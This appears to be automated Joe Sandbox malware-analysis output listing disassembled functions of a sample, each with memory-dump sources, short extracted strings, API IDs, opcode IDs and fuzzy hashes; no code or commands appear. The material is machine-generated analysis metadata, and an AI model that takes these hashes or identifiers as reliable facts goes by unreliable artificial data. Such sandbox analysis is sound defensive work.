                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                            • API String ID: 0-261129489
                                                                                                                                                                                                                                            • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                            • Instruction ID: d8023877f1d4f0a9fd76882124d92d38ceb2f3f40d54c865e1d6b88deb20c264
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0E1B67151C3C18AE775CF2584507FBBBD6EFD6208F1888AEC5D987292DB39410ACB26
                                                                                                                                                                                                                                            Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                            • API String ID: 0-2418547040
                                                                                                                                                                                                                                            • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                            • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                            Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                            • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                            • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                            Function 0040CFF3 Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                            • API String ID: 0-483502859
                                                                                                                                                                                                                                            • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                            • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                            Function 0249D25A Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                            • API String ID: 0-483502859
                                                                                                                                                                                                                                            • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                            • Instruction ID: d40615f4737d9136a2fb5e2ea9650c8d22d56d4359be3b3524cf045ddf46b0bc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09A1A1B56017818FD728CF29C590A62BFF2EF96314B1995AEC4D68F766D734E802CB10
                                                                                                                                                                                                                                            Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                            • API String ID: 0-2543814982
                                                                                                                                                                                                                                            • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                            • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                            Function 024A87DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                            • API String ID: 0-3307990326
                                                                                                                                                                                                                                            • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                            • Instruction ID: 42d08a021de3f72c2cb7fa87eb591ac07f85e20f86aec561d7416a97d7d4ee9e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A081CE756007128FC728CF29C8A0A67B7F2FFA9710B19859DD8824FB65EB34E841CB55
                                                                                                                                                                                                                                            Function 00419770 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                            • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                            • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                            • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                            Function 024A99D7 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                            • API String ID: 0-936430989
                                                                                                                                                                                                                                            • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                            • Instruction ID: c0b8439f0c26c5a6023c669713cfb19d18569ccc3e59d052a4a45f8e55fa5d3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4482F6746083509FD764CF24D8A0B2FBBE2EBE6714F28892EE58547391D771D842CB46
                                                                                                                                                                                                                                            Function 0040DD25 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                            • String ID: PT
                                                                                                                                                                                                                                            • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                            • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                            • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                            Function 0249DF8C Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                            • String ID: PT
                                                                                                                                                                                                                                            • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                            • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                            • Instruction ID: eff78ee87d626d3a0da557417c581b5285bdc2136f2726833c12f01c07caa04a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0A1DFB46087918FD726CF39C4A0A62BFE1EF57204B18869EC4D24FB66D339E406CB15
                                                                                                                                                                                                                                            Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: BE$de
                                                                                                                                                                                                                                            • API String ID: 0-1272349043
                                                                                                                                                                                                                                            • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                            • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                            Function 0249ABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: BE$de
                                                                                                                                                                                                                                            • API String ID: 0-1272349043
                                                                                                                                                                                                                                            • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                            • Instruction ID: 0e8e7438c804aa875dc6167410859db01fb727295b33fbb0f872cd46ad9a3b9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61D1097265C3648BDB24DF2888516AFFFE2EFC1208F18492DE8D59B391D675C506CB82
                                                                                                                                                                                                                                            Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: @$ihgf
                                                                                                                                                                                                                                            • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                            • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                            • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                            Function 024CCD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @$ihgf
                                                                                                                                                                                                                                            • API String ID: 0-73152791
                                                                                                                                                                                                                                            • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                            • Instruction ID: 3b0646e180deb50f7a5a6296c2ddec3a8370d05c4e091f09dadf3508a8fc815a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 814127B56043018BD754CF28C88177BBBA2FFC2318F24862EE4499B390E735D805CB82
                                                                                                                                                                                                                                            Function 024A554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Z\$^P
                                                                                                                                                                                                                                            • API String ID: 0-3724859648
                                                                                                                                                                                                                                            • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                            • Instruction ID: 6ef4766a72a4222674f0c3935a1b9cb7306982faf8762867b4605a3192e60b05
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E941C0B2911600CFC718CF28C9A2A62B7B2FF59314B1A859DD49B8F7A4E738E441CF55
                                                                                                                                                                                                                                            Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: AzB$`rB
                                                                                                                                                                                                                                            • API String ID: 0-365317308
                                                                                                                                                                                                                                            • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                            • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                            Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: AzB$`rB
                                                                                                                                                                                                                                            • API String ID: 0-365317308
                                                                                                                                                                                                                                            • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                            • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                            Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: c$
                                                                                                                                                                                                                                            • API String ID: 0-2516980088
                                                                                                                                                                                                                                            • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                            • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                            Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: A67H
                                                                                                                                                                                                                                            • API String ID: 0-3389657328
                                                                                                                                                                                                                                            • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                            • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                            Function 024A8F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: [
                                                                                                                                                                                                                                            • API String ID: 0-3878419350
                                                                                                                                                                                                                                            • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                            • Instruction ID: 3ba1abbb005ae7d47fef9b25955e9e631f09e9f174ff1680e564550c5f84974b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
